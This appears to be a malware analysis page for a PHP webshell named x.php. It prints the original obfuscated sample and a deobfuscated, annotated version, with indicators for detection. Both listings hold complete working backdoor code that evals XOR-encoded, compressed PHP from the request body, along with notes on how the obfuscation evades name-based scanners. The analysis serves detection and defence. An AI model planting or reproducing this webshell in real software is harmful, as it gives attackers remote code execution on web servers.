PHP Malware Analysis


Filename: x.php

Tags

Encoding
  • base64_decode
  • base64_encode
Execution
  • eval
Files
  • file_get_contents

Deobfuscated code

<?php

// Payload fragments. Each string below is a slice of PHP source with the filler
// token "1H" inserted at irregular points, so names such as eval, base64_decode,
// gzuncompress and file_get_contents never appear contiguously in these strings.
// A scanner that looks only for those literal names will not match the fragments.
// The variables are declared in a different order from the one in which they are
// later joined (see the original listing: $c.$F.$r.$X.$R.$Q.$k.$P).
$r = 'strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl';
$c = '$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l';
$Q = '"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(';
$k = '1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H';
$F = '61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H';
// Value resolved by the deobfuscator; the original sample builds this name at
// runtime with str_replace('D', '', ...), so the literal "create_function" is not
// present on disk either. create_function() compiles a string into a callable
// (functionally an eval); it was deprecated in PHP 7.2 and removed in PHP 8.0.
$t = "create_function";
$X = ');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg';
$R = '1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H';
$P = 'as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}';
// The assembled payload as the deobfuscator computed it: the fragments joined and
// every "1H" removed. This string is the function body handed to create_function
// in the original. It is the readable form to use when writing content signatures,
// but it exists only in memory at runtime, not in the file as stored.
$K = "\$k=\"e91a7330\";\$kh=\"bac1fe3ab27e\";\$kf=\"69a465d59f59\";\$p=\"l6XsGm7QunglLPBj\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
// Deobfuscator's rendering of the function that the original creates from $K:
// a request-driven backdoor that executes PHP code taken from the HTTP request
// body and returns the captured output in an encoded envelope.
//
// Indicators visible in this sample (all constants, so they travel in cleartext):
//   - request body contains "bac1fe3ab27e" ... "69a465d59f59" around a base64 blob
//   - response body is "l6XsGm7QunglLPBj" + "bac1fe3ab27e" + base64 + "69a465d59f59"
// Access logs that do not record request bodies will show only the hit on the
// script itself; matching the markers needs body inspection (WAF, proxy or
// packet capture) or a content scan of response bodies.
$p = function () {
    // 8-character key for the repeating-key XOR in x(); the same key is used
    // for the inbound command and the outbound result.
    $k = "e91a7330";
    // Header and footer markers that delimit the encoded blob in both directions.
    $kh = "bac1fe3ab27e";
    $kf = "69a465d59f59";
    // Fixed prefix printed before the response envelope.
    $p = "l6XsGm7QunglLPBj";
    // Repeating-key XOR of $t with $k. XOR is its own inverse, so this one
    // routine both decodes the request and encodes the response. This is
    // obfuscation of the traffic, not confidentiality: the key is in the file.
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        // Outer loop walks the input; inner loop restarts the key index at 0
        // each time the key is exhausted.
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    // php://input is the raw request body. The payload source builds this regex
    // from $kh and $kf; the deobfuscator has inlined their values here.
    // The leading @ on each call suppresses PHP warnings/notices, so a malformed
    // request leaves no error output.
    if (@preg_match("/bac1fe3ab27e(.+)69a465d59f59/", @file_get_contents("php://input"), $m) == 1) {
        // Buffer output so whatever the evaluated code prints can be captured.
        @ob_start();
        // Inbound decoding chain: base64 -> XOR with $k -> zlib inflate -> eval.
        // Whatever PHP the requester supplies runs with the web server's privileges.
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        // Outbound encoding mirrors the inbound one: zlib deflate -> XOR -> base64.
        $r = @base64_encode(@x(@gzcompress($o), $k));
        // Response envelope: prefix, header marker, encoded output, footer marker.
        print "{$p}{$kh}{$r}{$kf}";
    }
};
// The function is invoked immediately, so the check runs on every request to the file.
$p();


Original code

<?php
// Sample as found. Fragments of the payload source, each padded with the filler
// token "1H" so that function names such as eval and base64_decode are broken
// up inside the string literals.
$r='strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl';
$c='$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l';
$Q='"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(';
$k='1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H';
$F='61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H';
// Deleting every 'D' yields "create_function"; the name is assembled at runtime
// so it does not appear as a literal in the file. A str_replace() whose result
// is later called as a function is itself a useful static-analysis indicator.
$t=str_replace('D','','crDeDDDate_funDcDtion');
$X=');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg';
$R='1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H';
$P='as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}';
// Joins the fragments in execution order (not declaration order) and strips
// every "1H", producing the real payload source in memory only.
$K=str_replace('1H','',$c.$F.$r.$X.$R.$Q.$k.$P);
// $t('', $K) is create_function() with an empty parameter list and $K as the
// body, i.e. an eval of the assembled string; the resulting function is called
// immediately. create_function() was removed in PHP 8.0.
$p=$t('',$K);$p();
?>